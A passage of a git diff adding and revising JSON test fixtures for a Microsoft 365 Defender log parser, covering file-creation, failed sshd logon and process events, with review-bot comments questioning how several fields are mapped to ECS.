/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - 
Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": 
"commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json 
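Review bot: The expected `file.directory` here is `"C:\\Program Files\\FileName.dll"`, i.e. the full path including `FileName.dll`, so the test fixes a directory field that carries the file name. In this DeviceFileEvents payload `FolderPath` already ends with the file name, unlike the DeviceEvents fixture added in the same commit where `FolderPath` is a bare directory, so a straight FolderPath→file.directory mapping yields the wrong ECS semantics for this table. An expectation matching the field names would be `"directory": "C:\\Program Files"` together with `"path": "C:\\Program Files\\FileName.dll"`, with the parser stripping a trailing `FileName` from `FolderPath` before populating `file.directory`; that parser change lives outside this diff.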
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, 
\"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": 
\"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", 
\"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + 
"-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + 
"working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -30,6 +30,7 @@ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", 
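Review bot: `RemoteIP` (`1.2.3.4`) is pinned as `destination.ip`/`destination.address`, yet this is a `LogonFailed` with `LogonType: "Network"` recorded by `sshd` on the reporting host, so the remote address is presumably the peer that attempted the logon rather than the target; in ECS that is `source.ip`. If that reading holds, the expectation should be `"source": { "address": "1.2.3.4", "ip": "1.2.3.4" }` (`related.ip` is unaffected); if the parser deliberately treats DeviceLogonEvents `RemoteIP` as the destination, a comment in the parser stating the direction convention would keep this fixture from cementing an inverted mapping for brute-force detections. The input section of this fixture sits at the top of the hunk, so the mapping itself is decided by the parser outside this diff.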
@@ -69,31 +70,33 @@
 "54",
 "Scan"
 ],
- "code_signature": {
- "status": "Valid",
- "subject_name": "OsVendor"
- },
 "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54",
- "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
- "hash": {
- "md5": "5d5608654828cf052ba013b3c37cbb61",
- "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
- "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
- },
- "name": "MsMpEng.exe",
+ "name": "MpCmdRun.exe",
 "parent": {
- "name": "services.exe",
- "pid": 1032,
- "start": "2023-01-03T08:51:26.740241Z"
+ "code_signature": {
+ "status": "Valid",
+ "subject_name": "OsVendor"
+ },
+ "command_line": "\"MsMpEng.exe\"",
+ "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
+ "hash": {
+ "md5": "5d5608654828cf052ba013b3c37cbb61",
+ "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
+ "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
+ },
+ "name": "MsMpEng.exe",
+ "pid": 5456,
+ "start": "2023-01-03T08:51:29.269279Z",
+ "user": {
+ "domain": "NT",
+ "id": "S-1-1-11",
+ "name": "System"
+ },
+ "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
 },
 "pid": 37788,
 "start": "2023-01-04T14:15:10.355033Z",
- "user": {
- "domain": "NT",
- "id": "S-1-1-11",
- "name": "System"
- },
- "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
+ "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0"
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index d2e83b32a..9b0327128 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
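Review bot: The rewritten expected `process` for MpCmdRun.exe keeps only `name`, `pid`, `start` and `working_directory`, while `executable`, `hash.*`, `code_signature` and `user` now describe the parent MsMpEng.exe alone, so the spawned binary is no longer identifiable by hash or full path in the normalized event. The same shape appears in the test_device_process_events_2.json hunk, where the input visibly carries `SHA1`, `MD5`, `SHA256`, `FolderPath` and `AccountName`/`AccountDomain` for the created process `ps`, yet the expected `process` has none of those values. If the parser now maps only the `InitiatingProcess*` fields to `parent`, the non-prefixed fields should still populate `process.executable`, `process.hash.{md5,sha1,sha256}` and `process.user`, otherwise hash- and user-based detection on the child process regresses; if dropping them is intended, the parser change should say so. The `related.hash` block continues outside the hunk, so whether the child hashes survive there cannot be checked from this view.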
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
